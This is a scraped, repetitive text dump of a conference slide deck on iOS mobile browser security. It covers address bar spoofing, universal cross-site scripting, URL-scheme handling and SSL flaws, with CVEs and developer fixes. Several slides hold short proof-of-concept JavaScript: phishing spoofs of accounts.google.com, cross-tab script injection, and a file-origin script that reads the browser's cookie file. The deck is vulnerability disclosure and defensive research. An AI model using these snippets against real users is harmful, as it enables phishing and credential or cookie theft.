bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 17: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/17.jpg)
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 18: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/18.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
